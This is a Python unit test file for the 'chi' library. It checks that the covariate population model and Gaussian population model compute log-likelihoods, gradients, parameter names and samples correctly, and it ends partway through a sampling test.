# BSD 3-clause license. See accompanying LICENSE.md for copyright notice and
# full license details.
#
import unittest
import numpy as np
from scipy.stats import norm, truncnorm
import chi
class TestCovariatePopulationModel(unittest.TestCase):
"""
Tests the chi.CovariatePopulationModel class.
"""
@classmethod
def setUpClass(cls):
# Test case I
cls.pop_model = chi.GaussianModel()
cls.cov_model = chi.LogNormalLinearCovariateModel()
cls.cpop_model = chi.CovariatePopulationModel(
cls.pop_model, cls.cov_model)
# Test case II
cls.cov_model2 = chi.LogNormalLinearCovariateModel(n_covariates=2)
cls.cpop_model2 = chi.CovariatePopulationModel(
cls.pop_model, cls.cov_model2)
def test_bad_instantiation(self):
# Population model is not a SimplePopulationModel
pop_model = 'bad type'
with self.assertRaisesRegex(TypeError, 'The population model'):
chi.CovariatePopulationModel(
pop_model,
chi.LogNormalLinearCovariateModel())
# Covariate model is not a CovariateModel
cov_model = 'bad type'
with self.assertRaisesRegex(TypeError, 'The covariate model'):
chi.CovariatePopulationModel(
chi.GaussianModel(),
cov_model)
def test_compute_individual_parameters(self):
# Test case I: Model that is independent of covariates
# Test case I.1
parameters = [1, 1]
eta = [0.2, -0.3, 1, 5]
ref_psi = self.cov_model.compute_individual_parameters(parameters, eta)
psi = self.cpop_model.compute_individual_parameters(parameters, eta)
self.assertEqual(psi[0], ref_psi[0])
self.assertEqual(psi[1], ref_psi[1])
self.assertEqual(psi[2], ref_psi[2])
self.assertEqual(psi[3], ref_psi[3])
# Test case I.2
parameters = [0.3, 1E-10]
eta = [0.2, -0.3, 1, 5]
psi = self.cpop_model.compute_individual_parameters(parameters, eta)
self.assertAlmostEqual(psi[0], np.exp(0.3))
self.assertAlmostEqual(psi[1], np.exp(0.3))
self.assertAlmostEqual(psi[2], np.exp(0.3))
self.assertAlmostEqual(psi[3], np.exp(0.3))
# Test case II: Model that dependends on covariates
# Test case II.1
parameters = [1, 1, -1, 1]
eta = [0.2, -0.3, 1, 5]
covariates = np.ones(shape=(4, 2))
ref_psi = self.cov_model2.compute_individual_parameters(
parameters, eta, covariates)
psi = self.cpop_model2.compute_individual_parameters(
parameters, eta, covariates)
self.assertEqual(psi[0], ref_psi[0])
self.assertEqual(psi[1], ref_psi[1])
self.assertEqual(psi[2], ref_psi[2])
self.assertEqual(psi[3], ref_psi[3])
# Test case II.2
parameters = [0.3, 1E-20, 100, -100]
eta = [0.2, -0.3, 1, 5]
covariates = np.reshape(np.arange(8), newshape=(4, 2))
psi = self.cpop_model2.compute_individual_parameters(
parameters, eta, covariates)
self.assertAlmostEqual(psi[0], np.exp(0.3 + 100 * 0 - 100 * 1))
self.assertAlmostEqual(psi[1], np.exp(0.3 + 100 * 2 - 100 * 3))
self.assertAlmostEqual(psi[2], np.exp(0.3 + 100 * 4 - 100 * 5))
self.assertAlmostEqual(psi[3], np.exp(0.3 + 100 * 6 - 100 * 7))
def test_compute_individual_sensitivities(self):
n_ids = 5
# Test case I: mu != 0, sigma != 0
# Then psi = np.exp(mu)
# Test case I.1
parameters = [-1, 1]
eta = np.linspace(0.5, 1.5, n_ids)
covariates = 'some covariates'
# Compute psis and sensitivities
psis, sens = self.cpop_model.compute_individual_sensitivities(
parameters, eta, covariates)
ref_psis, ref_sens = self.cov_model.compute_individual_sensitivities(
parameters, eta, covariates)
self.assertEqual(len(psis), n_ids)
self.assertEqual(psis[0], ref_psis[0])
self.assertEqual(psis[1], ref_psis[1])
self.assertEqual(psis[2], ref_psis[2])
self.assertEqual(psis[3], ref_psis[3])
self.assertEqual(psis[4], ref_psis[4])
self.assertEqual(sens.shape, (3, n_ids))
self.assertEqual(sens[0, 0], ref_sens[0, 0])
self.assertEqual(sens[0, 1], ref_sens[0, 1])
self.assertEqual(sens[0, 2], ref_sens[0, 2])
self.assertEqual(sens[0, 3], ref_sens[0, 3])
self.assertEqual(sens[0, 4], ref_sens[0, 4])
self.assertEqual(sens[1, 0], ref_sens[1, 0])
self.assertEqual(sens[1, 1], ref_sens[1, 1])
self.assertEqual(sens[1, 2], ref_sens[1, 2])
self.assertEqual(sens[1, 3], ref_sens[1, 3])
self.assertEqual(sens[1, 4], ref_sens[1, 4])
self.assertEqual(sens[2, 0], ref_sens[2, 0])
self.assertEqual(sens[2, 1], ref_sens[2, 1])
self.assertEqual(sens[2, 2], ref_sens[2, 2])
self.assertEqual(sens[2, 3], ref_sens[2, 3])
self.assertEqual(sens[2, 4], ref_sens[2, 4])
def test_compute_log_likelihood(self):
n_ids = 10
# Test case I:
# Test case I.1:
etas = [1] * n_ids
mu_log = 1
sigma_log = 10
# Parameters of standard normal (mean=0, std=1)
ref_score = self.pop_model.compute_log_likelihood([0, 1], etas)
parameters = [mu_log] + [sigma_log]
score = self.cpop_model.compute_log_likelihood(parameters, etas)
self.assertEqual(score, ref_score)
# Test case I.2:
etas = [1] * n_ids
mu_log = 0.1
sigma_log = 5
# Parameters of standard normal (mean=0, std=1)
sigma = 1
ref_score = -n_ids * (
np.log(2 * np.pi * sigma**2) / 2 + etas[0]**2 / (2 * sigma**2))
parameters = [mu_log] + [sigma_log]
score = self.cpop_model.compute_log_likelihood(parameters, etas)
self.assertAlmostEqual(score, ref_score)
# Test case I.3:
etas = [0.2] * n_ids
mu_log = 1
sigma_log = 2
# Parameters of standard normal (mean=0, std=1)
ref_score = -n_ids * (
np.log(2 * np.pi * 1**2) / 2 + etas[0]**2 / (2 * 1**2))
parameters = [mu_log] + [sigma_log]
score = self.cpop_model.compute_log_likelihood(parameters, etas)
self.assertAlmostEqual(score, ref_score)
def test_compute_pointwise_ll(self):
# Hard to test exactly, but at least test some edge cases where
# loglikelihood is straightforward to compute analytically
n_ids = 10
# Test case I:
# Test case I.1:
etas = [1] * n_ids
mu_log = 1
sigma_log = 10
# Parameters of standard normal (mean=0, std=1)
ref_score = -n_ids * (
np.log(2 * np.pi * 1**2) / 2 + etas[0]**2 / (2 * 1**2))
parameters = [mu_log] + [sigma_log]
scores = self.cpop_model.compute_pointwise_ll(parameters, etas)
self.assertEqual(len(scores), 10)
self.assertAlmostEqual(np.sum(scores), ref_score)
self.assertTrue(np.allclose(scores, ref_score / 10))
# Test case I.2:
etas = [1] * n_ids
mu_log = 0.1
sigma_log = 5
# Parameters of standard normal (mean=0, std=1)
sigma = 1
ref_score = -n_ids * (
np.log(2 * np.pi * sigma**2) / 2 + etas[0]**2 / (2 * sigma**2))
parameters = [mu_log] + [sigma_log]
scores = self.cpop_model.compute_pointwise_ll(parameters, etas)
self.assertEqual(len(scores), 10)
self.assertAlmostEqual(np.sum(scores), ref_score)
self.assertTrue(np.allclose(scores, ref_score / 10))
# Test case I.3:
etas = [0.2] * n_ids
mu_log = 1
sigma_log = 2
# Parameters of standard normal (mean=0, std=1)
ref_score = -n_ids * (
np.log(2 * np.pi * 1**2) / 2 + etas[0]**2 / (2 * 1**2))
parameters = [mu_log] + [sigma_log]
scores = self.cpop_model.compute_pointwise_ll(parameters, etas)
self.assertEqual(len(scores), 10)
self.assertAlmostEqual(np.sum(scores), ref_score)
self.assertTrue(np.allclose(scores, ref_score / 10))
def test_compute_sensitivities(self):
n_ids = 10
# Test case I: Non-centered Log-Normal model
# Sensitivities reduce to
# deta = -eta
# dmu_log = 0
# dsigma_log = 0
# Test case I.1:
etas = [1] * n_ids
mu_log = 1
sigma_log = 1
# Compute ref scores
parameters = [mu_log] + [sigma_log]
ref_ll = self.cpop_model.compute_log_likelihood(parameters, etas)
ref_detas = -1 * np.array(etas)
ref_dmu = 0
ref_dsigma = 0
# Compute log-likelihood and sensitivities
score, sens = self.cpop_model.compute_sensitivities(parameters, etas)
self.assertEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertEqual(sens[0], ref_detas[0])
self.assertEqual(sens[1], ref_detas[1])
self.assertEqual(sens[2], ref_detas[2])
self.assertEqual(sens[3], ref_detas[3])
self.assertEqual(sens[4], ref_detas[4])
self.assertEqual(sens[5], ref_detas[5])
self.assertEqual(sens[6], ref_detas[6])
self.assertEqual(sens[7], ref_detas[7])
self.assertEqual(sens[8], ref_detas[8])
self.assertEqual(sens[9], ref_detas[9])
self.assertEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case I.2:
etas = np.arange(n_ids)
mu_log = 1
sigma_log = 1
# Compute ref scores
parameters = [mu_log] + [sigma_log]
ref_ll = self.cpop_model.compute_log_likelihood(parameters, etas)
ref_detas = -1 * np.array(etas)
ref_dmu = 0
ref_dsigma = 0
# Compute log-likelihood and sensitivities
score, sens = self.cpop_model.compute_sensitivities(parameters, etas)
self.assertEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertEqual(sens[0], ref_detas[0])
self.assertEqual(sens[1], ref_detas[1])
self.assertEqual(sens[2], ref_detas[2])
self.assertEqual(sens[3], ref_detas[3])
self.assertEqual(sens[4], ref_detas[4])
self.assertEqual(sens[5], ref_detas[5])
self.assertEqual(sens[6], ref_detas[6])
self.assertEqual(sens[7], ref_detas[7])
self.assertEqual(sens[8], ref_detas[8])
self.assertEqual(sens[9], ref_detas[9])
self.assertEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case I.3:
etas = np.arange(n_ids)
mu_log = -1
sigma_log = 10
# Compute ref scores
parameters = [mu_log] + [sigma_log]
ref_ll = self.cpop_model.compute_log_likelihood(parameters, etas)
ref_detas = -1 * np.array(etas)
ref_dmu = 0
ref_dsigma = 0
# Compute log-likelihood and sensitivities
score, sens = self.cpop_model.compute_sensitivities(parameters, etas)
self.assertEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertEqual(sens[0], ref_detas[0])
self.assertEqual(sens[1], ref_detas[1])
self.assertEqual(sens[2], ref_detas[2])
self.assertEqual(sens[3], ref_detas[3])
self.assertEqual(sens[4], ref_detas[4])
self.assertEqual(sens[5], ref_detas[5])
self.assertEqual(sens[6], ref_detas[6])
self.assertEqual(sens[7], ref_detas[7])
self.assertEqual(sens[8], ref_detas[8])
self.assertEqual(sens[9], ref_detas[9])
self.assertEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case II: Linear covariate model
etas = np.arange(n_ids)
mu_log = -1
sigma_log = 10
shifts = [1, 2]
# Compute ref scores
# (Distribution of eta is independent of model parameters, it's always
# standard Gaussian. Thus sensitivities of likelihood are zero.)
parameters = [mu_log] + [sigma_log] + shifts
ref_ll = self.cpop_model2.compute_log_likelihood(
parameters, etas)
ref_detas = -1 * np.array(etas)
ref_dmu = 0
ref_dsigma = 0
ref_dshift0 = 0
ref_dshift1 = 0
# Compute log-likelihood and sensitivities
score, sens = self.cpop_model2.compute_sensitivities(
parameters, etas)
self.assertEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 4)
self.assertEqual(sens[0], ref_detas[0])
self.assertEqual(sens[1], ref_detas[1])
self.assertEqual(sens[2], ref_detas[2])
self.assertEqual(sens[3], ref_detas[3])
self.assertEqual(sens[4], ref_detas[4])
self.assertEqual(sens[5], ref_detas[5])
self.assertEqual(sens[6], ref_detas[6])
self.assertEqual(sens[7], ref_detas[7])
self.assertEqual(sens[8], ref_detas[8])
self.assertEqual(sens[9], ref_detas[9])
self.assertEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
self.assertAlmostEqual(sens[12], ref_dshift0)
self.assertAlmostEqual(sens[13], ref_dshift1)
def test_get_covariate_model(self):
cov_model = self.cpop_model.get_covariate_model()
self.assertIsInstance(cov_model, chi.CovariateModel)
def test_get_covariate_names(self):
# Test case I:
names = []
self.assertEqual(self.cpop_model.get_covariate_names(), names)
# Test case II:
names = ['Covariate 1', 'Covariate 2']
self.assertEqual(self.cpop_model2.get_covariate_names(), names)
def test_get_parameter_names(self):
# Test case I:
names = ['Base mean log', 'Std. log']
self.assertEqual(self.cpop_model.get_parameter_names(), names)
# Test case II:
names = [
'Base mean log', 'Std. log', 'Shift Covariate 1',
'Shift Covariate 2']
self.assertEqual(self.cpop_model2.get_parameter_names(), names)
def test_n_hierarchical_parameters(self):
# Test case I:
n_ids = 10
n_hierarchical_params = self.cpop_model.n_hierarchical_parameters(
n_ids)
self.assertEqual(len(n_hierarchical_params), 2)
self.assertEqual(n_hierarchical_params[0], n_ids)
self.assertEqual(n_hierarchical_params[1], 2)
# Test case II:
n_ids = 10
n_hierarchical_params = self.cpop_model2.n_hierarchical_parameters(
n_ids)
self.assertEqual(len(n_hierarchical_params), 2)
self.assertEqual(n_hierarchical_params[0], n_ids)
self.assertEqual(n_hierarchical_params[1], 4)
def test_n_covariates(self):
# Test case I:
n_cov = self.cpop_model.n_covariates()
self.assertEqual(n_cov, 0)
# Test case II:
n_cov = self.cpop_model2.n_covariates()
self.assertEqual(n_cov, 2)
def test_n_parameters(self):
self.assertEqual(self.cpop_model.n_parameters(), 2)
def test_transforms_individual_parameters(self):
self.assertTrue(self.cpop_model.transforms_individual_parameters())
def test_sample(self):
# Test I: sample size 1
# Test case I.1: return eta
seed = 42
parameters = [3, 2]
sample = self.cpop_model.sample(parameters, seed=seed)
n_samples = 1
self.assertEqual(sample.shape, (n_samples,))
# Test case I.2: return psi
sample = self.cpop_model.sample(parameters, seed=seed, return_psi=True)
self.assertEqual(sample.shape, (n_samples,))
# Test II: sample size > 1
# Test case II.1: return eta
parameters = [3, 2]
n_samples = 4
sample = self.cpop_model.sample(
parameters, n_samples=n_samples, seed=seed)
self.assertEqual(
sample.shape, (n_samples,))
# Test case II.2: return psi
sample = self.cpop_model.sample(
parameters, n_samples=n_samples, seed=seed, return_psi=True)
self.assertEqual(sample.shape, (n_samples,))
# Test III: Model with covariates
# Test case III.1: return eta
seed = 42
parameters = [3, 2, 10, 20]
covariates = [2, 4]
sample = self.cpop_model2.sample(
parameters, covariates=covariates, seed=seed, return_psi=False)
n_samples = 1
self.assertEqual(sample.shape, (n_samples,))
# Test case III.2: return psi
sample = self.cpop_model2.sample(
parameters, covariates=covariates, seed=seed, return_psi=True)
self.assertEqual(sample.shape, (n_samples,))
def test_sample_bad_input(self):
# Covariates do not match
parameters = [3, 2, 10, 20]
covariates = ['this', 'is', 'the', 'wrong', 'length']
with self.assertRaisesRegex(ValueError, 'Covariates must be of'):
self.cpop_model2.sample(parameters, covariates=covariates)
def test_set_covariate_names(self):
# Test some name
names = []
self.cpop_model.set_covariate_names(names)
# This covariate model has no covariates
self.assertEqual(
self.cpop_model.get_covariate_names(), [])
def test_set_parameter_names(self):
# Test some name
names = ['test', 'name']
self.cpop_model.set_parameter_names(names)
self.assertEqual(
self.cpop_model.get_parameter_names(), names)
# Set back to default name
self.cpop_model.set_parameter_names(None)
names = self.cpop_model.get_parameter_names()
self.assertEqual(len(names), 2)
self.assertEqual(names[0], 'Base mean log')
self.assertEqual(names[1], 'Std. log')
class TestGaussianModel(unittest.TestCase):
"""
Tests the chi.GaussianModel class.
"""
@classmethod
def setUpClass(cls):
cls.pop_model = chi.GaussianModel()
def test_compute_log_likelihood(self):
n_ids = 10
# Test case I: psis = 1, mu = 1, sigma = 1
# Score reduces to
# -nids * np.log(2pi) / 2
# Test case I.1:
psis = [1] * n_ids
mu = 1
sigma = 1
ref_score = - n_ids * np.log(2 * np.pi) / 2
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case I.2:
psis = [5] * n_ids
mu = 5
sigma = 1
ref_score = - n_ids * np.log(2 * np.pi) / 2
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case II: psis != mu, sigma = 1.
# Score reduces to
# -nids * (np.log(2pi)/2 + (psi - mu)^2/2)
# Test case II.1:
psis = [2] * n_ids
mu = 1
sigma = 1
ref_score = \
- n_ids * np.log(2 * np.pi) / 2 \
- n_ids * (psis[0] - mu)**2 / 2
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case II.2:
psis = [2] * n_ids
mu = 10
sigma = 1
ref_score = \
- n_ids * np.log(2 * np.pi) / 2 \
- n_ids * (psis[0] - mu)**2 / 2
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# # Test case III: Any parameters
# Test case III.1
psis = np.arange(10)
mu = 1
sigma = 1
ref_score = \
- n_ids * np.log(2 * np.pi) / 2 \
- n_ids * np.log(sigma) \
- np.sum((psis - mu)**2) / (2 * sigma ** 2)
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case III.2
psis = np.arange(10)
mu = 10
sigma = 15
ref_score = \
- n_ids * np.log(2 * np.pi) / 2 \
- n_ids * np.log(sigma) \
- np.sum((psis - mu)**2) / (2 * sigma ** 2)
parameters = [mu, sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertAlmostEqual(score, ref_score)
# Test case IV: sigma negative or zero
# Test case IV.1
psis = [np.exp(10)] * n_ids
mu = 1
sigma = 0
parameters = [mu] + [sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(score, -np.inf)
# Test case IV.2
psis = [np.exp(10)] * n_ids
mu = 1
sigma = -1
parameters = [mu] + [sigma]
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(score, -np.inf)
def test_compute_pointwise_ll(self):
# Test case I.1:
psis = np.arange(10)
mu = 1
sigma = 1
ref_scores = \
- np.log(2 * np.pi) / 2 \
- np.log(sigma) \
- (psis - mu)**2 / (2 * sigma ** 2)
parameters = [mu, sigma]
pw_scores = self.pop_model.compute_pointwise_ll(parameters, psis)
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(len(pw_scores), 10)
self.assertAlmostEqual(np.sum(pw_scores), score)
self.assertAlmostEqual(pw_scores[0], ref_scores[0])
self.assertAlmostEqual(pw_scores[1], ref_scores[1])
self.assertAlmostEqual(pw_scores[2], ref_scores[2])
self.assertAlmostEqual(pw_scores[3], ref_scores[3])
self.assertAlmostEqual(pw_scores[4], ref_scores[4])
self.assertAlmostEqual(pw_scores[5], ref_scores[5])
self.assertAlmostEqual(pw_scores[6], ref_scores[6])
self.assertAlmostEqual(pw_scores[7], ref_scores[7])
self.assertAlmostEqual(pw_scores[8], ref_scores[8])
self.assertAlmostEqual(pw_scores[9], ref_scores[9])
# Test case I.2:
psis = np.linspace(3, 5, 10)
mu = 2
sigma = 4
ref_scores = \
- np.log(2 * np.pi) / 2 \
- np.log(sigma) \
- (psis - mu)**2 / (2 * sigma ** 2)
parameters = [mu, sigma]
pw_scores = self.pop_model.compute_pointwise_ll(parameters, psis)
score = self.pop_model.compute_log_likelihood(parameters, psis)
self.assertEqual(len(pw_scores), 10)
self.assertAlmostEqual(np.sum(pw_scores), score)
self.assertAlmostEqual(pw_scores[0], ref_scores[0])
self.assertAlmostEqual(pw_scores[1], ref_scores[1])
self.assertAlmostEqual(pw_scores[2], ref_scores[2])
self.assertAlmostEqual(pw_scores[3], ref_scores[3])
self.assertAlmostEqual(pw_scores[4], ref_scores[4])
self.assertAlmostEqual(pw_scores[5], ref_scores[5])
self.assertAlmostEqual(pw_scores[6], ref_scores[6])
self.assertAlmostEqual(pw_scores[7], ref_scores[7])
self.assertAlmostEqual(pw_scores[8], ref_scores[8])
self.assertAlmostEqual(pw_scores[9], ref_scores[9])
# Test case IV: sigma negative or zero
# Test case IV.1
psis = [np.exp(10)] * 3
mu = 1
sigma = 0
parameters = [mu] + [sigma]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(scores[0], -np.inf)
self.assertEqual(scores[1], -np.inf)
self.assertEqual(scores[2], -np.inf)
# Test case IV.2
psis = [np.exp(10)] * 3
mu = 1
sigma = -10
parameters = [mu] + [sigma]
scores = self.pop_model.compute_pointwise_ll(parameters, psis)
self.assertEqual(scores[0], -np.inf)
self.assertEqual(scores[1], -np.inf)
self.assertEqual(scores[2], -np.inf)
def test_compute_sensitivities(self):
n_ids = 10
# Test case I: psis = mu, sigma = 1
# Sensitivities reduce to
# dpsi = 0
# dmu = 0
# dsigma = -n_ids
# Test case I.1:
psis = [1] * n_ids
mu = 1
sigma = 1
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = 0
ref_dmu = 0
ref_dsigma = -n_ids
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case I.2:
psis = [10] * n_ids
mu = 10
sigma = 1
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = 0
ref_dmu = 0
ref_dsigma = -n_ids
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case II: psis != mu, sigma = 1
# Sensitivities reduce to
# dpsi = mu - psi
# dmu = psi - mu
# dsigma = nids * ((psi - mu)^2 - 1)
# Test case II.1:
psis = np.array([1] * n_ids)
mu = 10
sigma = 1
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = mu - psis[0]
ref_dmu = np.sum(psis - mu)
ref_dsigma = - n_ids + np.sum((psis - mu)**2)
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case II.2:
psis = np.array([7] * n_ids)
mu = 5
sigma = 1
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = mu - psis[0]
ref_dmu = np.sum(psis - mu)
ref_dsigma = - n_ids + np.sum((psis - mu)**2)
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case III: psis != mu, sigma != 1
# Sensitivities reduce to
# dpsi = (mu - psi) / std**2
# dmu = sum((psi - mu)) / std**2
# dsigma = -nids / std + sum((psi - mu)^2) / std**2
# Test case III.1:
psis = np.array([1] * n_ids)
mu = 10
sigma = 2
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = (mu - psis[0]) / sigma**2
ref_dmu = np.sum(psis - mu) / sigma**2
ref_dsigma = - n_ids / sigma + np.sum((psis - mu)**2) / sigma**3
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma, 5)
# Test case III.2:
psis = np.array([7] * n_ids)
mu = 0.5
sigma = 0.1
# Compute ref scores
parameters = [mu, sigma]
ref_ll = self.pop_model.compute_log_likelihood(parameters, psis)
ref_dpsi = (mu - psis[0]) / sigma**2
ref_dmu = np.sum(psis - mu) / sigma**2
ref_dsigma = - n_ids / sigma + np.sum((psis - mu)**2) / sigma**3
# Compute log-likelihood and sensitivities
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertAlmostEqual(score, ref_ll)
self.assertEqual(len(sens), n_ids + 2)
self.assertAlmostEqual(sens[0], ref_dpsi)
self.assertAlmostEqual(sens[1], ref_dpsi)
self.assertAlmostEqual(sens[2], ref_dpsi)
self.assertAlmostEqual(sens[3], ref_dpsi)
self.assertAlmostEqual(sens[4], ref_dpsi)
self.assertAlmostEqual(sens[5], ref_dpsi)
self.assertAlmostEqual(sens[6], ref_dpsi)
self.assertAlmostEqual(sens[7], ref_dpsi)
self.assertAlmostEqual(sens[8], ref_dpsi)
self.assertAlmostEqual(sens[9], ref_dpsi)
self.assertAlmostEqual(sens[10], ref_dmu)
self.assertAlmostEqual(sens[11], ref_dsigma)
# Test case IV: Compare gradients to numpy.gradient
epsilon = 0.001
n_parameters = n_ids + self.pop_model.n_parameters()
parameters = np.ones(shape=n_parameters)
ref_sens = []
for index in range(n_parameters):
# Construct parameter grid
low = parameters.copy()
low[index] -= epsilon
high = parameters.copy()
high[index] += epsilon
# Compute reference using numpy.gradient
sens = np.gradient(
[
self.pop_model.compute_log_likelihood(
low[n_ids:], low[:n_ids]),
self.pop_model.compute_log_likelihood(
parameters[n_ids:], parameters[:n_ids]),
self.pop_model.compute_log_likelihood(
high[n_ids:], high[:n_ids])],
(epsilon))
ref_sens.append(sens[1])
# Compute sensitivities with hierarchical model
_, sens = self.pop_model.compute_sensitivities(
parameters[n_ids:], parameters[:n_ids])
self.assertEqual(len(sens), 12)
self.assertEqual(sens[0], ref_sens[0])
self.assertEqual(sens[1], ref_sens[1])
self.assertEqual(sens[2], ref_sens[2])
self.assertEqual(sens[3], ref_sens[3])
self.assertEqual(sens[4], ref_sens[4])
self.assertEqual(sens[5], ref_sens[5])
self.assertEqual(sens[6], ref_sens[6])
self.assertEqual(sens[7], ref_sens[7])
self.assertEqual(sens[8], ref_sens[8])
self.assertEqual(sens[9], ref_sens[9])
self.assertAlmostEqual(sens[10], ref_sens[10], 5)
self.assertAlmostEqual(sens[11], ref_sens[11], 5)
# Test case V: sigma_log negative or zero
# Test case V.1
psis = [np.exp(10)] * n_ids
mu = 1
sigma = 0
parameters = [mu] + [sigma]
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertEqual(score, -np.inf)
self.assertEqual(sens[0], np.inf)
self.assertEqual(sens[1], np.inf)
self.assertEqual(sens[2], np.inf)
# Test case V.2
psis = [np.exp(10)] * n_ids
mu = 1
sigma = -10
parameters = [mu] + [sigma]
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertEqual(score, -np.inf)
self.assertEqual(sens[0], np.inf)
self.assertEqual(sens[1], np.inf)
self.assertEqual(sens[2], np.inf)
def test_get_parameter_names(self):
names = ['Mean', 'Std.']
self.assertEqual(self.pop_model.get_parameter_names(), names)
def test_n_hierarchical_parameters(self):
n_ids = 10
n_hierarchical_params = self.pop_model.n_hierarchical_parameters(n_ids)
self.assertEqual(len(n_hierarchical_params), 2)
self.assertEqual(n_hierarchical_params[0], n_ids)
self.assertEqual(n_hierarchical_params[1], 2)
def test_n_parameters(self):
self.assertEqual(self.pop_model.n_parameters(), 2)
def test_sample(self):
# Test I: sample size 1
seed = np.random.default_rng(seed=42)
parameters = [3, 2]
